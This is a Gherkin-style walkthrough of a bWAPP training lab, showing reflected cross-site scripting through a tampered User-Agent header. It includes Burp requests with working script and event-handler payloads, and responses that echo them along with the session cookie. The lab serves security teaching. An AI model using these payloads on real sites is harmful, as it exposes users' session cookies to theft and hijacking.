# language: en

Feature: XSS Reflected (User-Agent)
  From system bWAPP
  From the A3 - Cross Site Scripting
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following in the url
  """
  URL: http://localhost/bWAPP/xss_user_agent.php
  Message: XSS (User-Agent)
  Details:
        - User-Agent being logged into site
  Objective: Perform XSS on the User-Agent headers
  """

Scenario: XSS Reflected (User-Agent)
  Given the vulnerable form, my user-agent gets logged into the site
  """
  # User-Agent rendered into HTML
  Your User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
  Firefox/52.0
  """
  Then I use Burp to tamper the request and send a custom user-agent
  """
  # Burp Request to tamper
  GET /bWAPP/xss_user_agent.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Custom-User-Agent Trve-Cvlt
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate

  # Response
  Your User-Agent: Custom-User-Agent Trve-Cvlt
  """
  And now I tamper it to inject javascript into the header
  """
  # Burp Request, inject js code into User-Agent header
  GET /bWAPP/xss_user_agent.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: '<script>document.write(document.cookie)</script>
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5

  # Response
  <div id="main">
    <h1>XSS - Reflected (User-Agent)</h1>
    <p>Your User-Agent: <i>'<script>document.write(document.cookie)\
    </script></i></p>
  </div>

  # Your User-Agent: security_level=0;
  # PHPSESSID=f94dbdf2684e026e2108f8f171f90430; has_js=1

  # It worked, Let's try with something else.
  # Burp Request
  GET /bWAPP/xss_user_agent.php HTTP/1.1
  Host: 192.168.56.101
  User-Agent: <a onmouseover="alert(1)" href="#">read this!</a>
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate

  # Response
  <div id="main">
    <h1>XSS - Reflected (User-Agent)</h1>
    <p>Your User-Agent: <i><a onmouseover="alert(1)" href="#">read this!</a>\
    </i></p>
  </div>
  """
